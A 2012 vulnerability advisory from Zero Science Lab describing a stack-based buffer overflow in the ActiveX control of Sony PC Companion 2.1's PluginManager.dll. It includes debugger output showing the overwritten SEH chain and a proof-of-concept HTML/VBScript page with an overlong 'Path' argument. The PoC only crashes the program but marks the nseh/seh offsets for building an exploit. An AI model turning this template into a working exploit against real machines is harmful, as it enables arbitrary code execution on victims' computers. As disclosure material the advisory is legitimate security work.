Sony PC Companion 2.1 (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overload SEH Vendor: Sony Mobile Communications AB Product web page: http://www.sonymobile.com Affected version: 2.10.115 (Production 27.1, Build 830) 2.10.108 (Production 26.1, Build 818) Summary: PC Companion is a computer application that acts as a portal to Sony Xperia and operator features and applications, such as phone software updates, management of contacts and calendar, media management with Media Go, and a backup and restore feature for your phone content. Desc: The vulnerability is caused due to a boundary error in PluginManager.dll when handling the value assigned to the 'Path' item in the Admin_RemoveDirectory function and can be exploited to cause a stack-based buffer overflow via an overly long string which may lead to execution of arbitrary code on the affected machine. ------------------------------------------------------------------------------ STATUS_STACK_BUFFER_OVERRUN encountered (1e5c.1b34): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=6348e958 ecx=75b1de28 edx=0013e505 esi=00000000 edi=0013ed88 eip=75b1dca5 esp=0013e74c ebp=0013e7c8 iopl=0 nv up ei pl zr na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000246 KERNEL32!FormatMessageA+0x13c85: 75b1dca5 ccint 3 0:000> !exchain 0013e7b8: KERNEL32!RegSaveKeyExA+3e9 (75b49b72) 0013f114: 00430043 Invalid exception stack at 00420042 0:000> d 0013f114 0013f11442 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00B.B.C.C.D.D.D.D. 0013f12444 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0013f13444 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0013f14444 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0013f15444 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0013f16444 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0013f17444 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0013f18444 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00D.D.D.D.D.D.D.D. 0:000> ------------------------------------------------------------------------------ Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5120 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5120.php http://cwe.mitre.org/data/definitions/121.html 09.11.2012 --- <html> <body> <object classid='clsid:BBB7AA7C-DCE4-4F85-AED3-72FE3BCA4141' id='overrun' /> <script language='vbscript'> targetFile = "C:\Program Files\Sony\Sony PC Companion\PluginManager.dll" prototype= "Function Admin_RemoveDirectory ( ByVal Path As String ) As tagRemoveDirectoryError" memberName = "Admin_RemoveDirectory" progid = "PluginManagerLib.ElevatedTasks" argCount = 1 Path=String(760, "A") + "BB" + "CC" + String(1000, "D") '^ ^ ^^ '| | || '------------ junk ---- nseh -- seh ------- junk -------- overrun.Admin_RemoveDirectory Path </script> </body> </html>
体验盒子
